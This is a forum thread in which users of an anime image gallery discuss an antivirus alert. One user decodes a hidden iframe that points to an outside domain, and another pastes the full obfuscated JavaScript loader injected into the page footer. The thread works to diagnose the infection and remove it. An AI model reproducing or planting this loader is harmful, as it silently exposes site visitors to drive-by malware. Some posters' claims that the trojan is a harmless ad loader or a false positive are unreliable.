Thread: Gallery Trojan

The requested URL could not be retrieved

While trying to retrieve the URL:

Main Index - Anime Online Gallery

The following error was encountered:

The requested object is INFECTED with the following viruses: Trojan-Downloader.JS.Iframe.anj


Please contact your service provider if you consider it incorrect.

I use Kaspersky, also I went over to the Kaspersky Lab forums and many of the staff say its a false positive.

I've been getting the message for about 3 months now maybe. Could it be an ad that's in the gallery?

Also here is where my trojan goes to every time,

C:\Documents and Settings\Vortex\Local Settings\Application Data\Mozilla\Firefox\Profiles\9y4ti2wo.default\Cac he

And it always has the same file name "7EE25133d01"

Edit:

I would also like to add on that I see a site in the name of "lazyfish" that I googled and some others also get it as a virus/trojan.

Yep, hacker code on there

There's some obfuscated javascript at the bottom of the page indicative of hacker code, and that's probably what set off your AV

It's too long to post the JS but this is what it decodes to:

Code:

<iframe height="1" width="1" src="http://triplex.lazyfish.cc/forum/Lasna"

That seemed to be empty when I visited the gypsy page, but it does return codes when I put it through Jutaky's detector and it's more obfuscated javascript. I can't see what it's hiding though

Link:
Who-Is-Who-In-GPT -> Gypsy Jackpot Virus upon Sign in

took a look at the source code for the gallery main page, and I found this

Code:

<script>check_content()</script><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49085183dbae7(m49085183dc3cb){ function m49085183dca5d(){return 16;} return (parseInt(m49085183dc3cb,m49085183dca5d()));}function m49085183dd613(m49085183dd9f9){ function m49085183de5b3(){var m49085183de9c2=2;return m49085183de9c2;} var m49085183ddde3='';m49085183df175=String.fromCharCode;for(m49085183de1df=0;m49085183de1df<m49085183dd9f9.length;m49085183de1df+=m49085183de5b3()){ m49085183ddde3+=(m49085183df175(c41687154048m49085183dbae7(m49085183dd9f9.substr(m49085183de1df,m49085183de5b3()))));}return m49085183ddde3;} var z18='';var m49085183df939='3C7'+z18+'3637'+z18+'2697'+z18+'07'+z18+'43E696628216D7'+z18+'96961297'+z18+'B646F637'+z18+'56D656E7'+z18+'42E7'+z18+'7'+z18+'7'+z18+'2697'+z18+'465287'+z18+'56E657'+z18+'363617'+z18+'065282027'+z18+'2533632536392536362537'+z18+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+z18+'332537'+z18+'32253633253364253237'+z18+'2536382537'+z18+'342537'+z18+'342537'+z18+'302533612532662532662536322537'+z18+'35253637'+z18+'2537'+z18+'61253639253663253663253631253265253638253639253637'+z18+'2536382536632536352537'+z18+'362536352536632532652536322536392537'+z18+'612532662536362536662537'+z18+'322537'+z18+'352536642532662534632536312537'+z18+'33253665253631253366253237'+z18+'2532622534642536312537'+z18+'342536382532652537'+z18+'322536662537'+z18+'352536652536342532382534642536312537'+z18+'342536382532652537'+z18+'32253631253665253634253666253664253238253239253261253337'+z18+'253338253337'+z18+'253330253333253239253262253237'+z18+'253332253335253237'+z18+'2532302537'+z18+'37'+z18+'2536392536342537'+z18+'34253638253364253333253337'+z18+'253333253230253638253635253639253637'+z18+'2536382537'+z18+'342533642533322533312533312532302537'+z18+'332537'+z18+'342537'+z18+'39253663253635253364253237'+z18+'2536342536392537'+z18+'332537'+z18+'302536632536312537'+z18+'39253361253230253665253666253665253635253237'+z18+'2533652533632532662536392536362537'+z18+'3225363125366425363525336527'+z18+'29293B7'+z18+'D7'+z18+'6617'+z18+'2206D7'+z18+'969613D7'+z18+'47'+z18+'27'+z18+'5653B3C2F7'+z18+'3637'+z18+'2697'+z18+'07'+z18+'43E';document.write(m49085183dd613(m49085183df939));</script><script>check_content()</script>

Right down at the bottom of the page. Might want to check the footer.php file and see if its there, shouldn't be too hard to remove

Wait wats going on? Whats this about scripts? plz tell me!

Originally Posted by zangetsu412

Wait wats going on? Whats this about scripts? plz tell me!

I think its an AD trojan (loads ads in your browser) honestly nothing to big to worry about but I haven't heard too much word about this trojan so don't be to careless.

Well, It's true that there's a trojan in the gallery as my antivirus detected it, but it isn't a big problem since I know that it exists & it doesn't deal real damage to the computer

As an unprotected Mac user with a UNIX kernel OS and without anti-virus i get this:

If i click [ignore warning], safari ignore the malicious code and the page go back to normal.



And if i click on [information], i see animeonline.net blacklisted by Google.

This is serious guys. It is not a false alert like an over-protective anti virus program make it sounds like.

I received the message in FF but when I changed to IE, it worked fine. I don't know FF is being stupid. I even tried to update the Add-ons but there wasn't any available.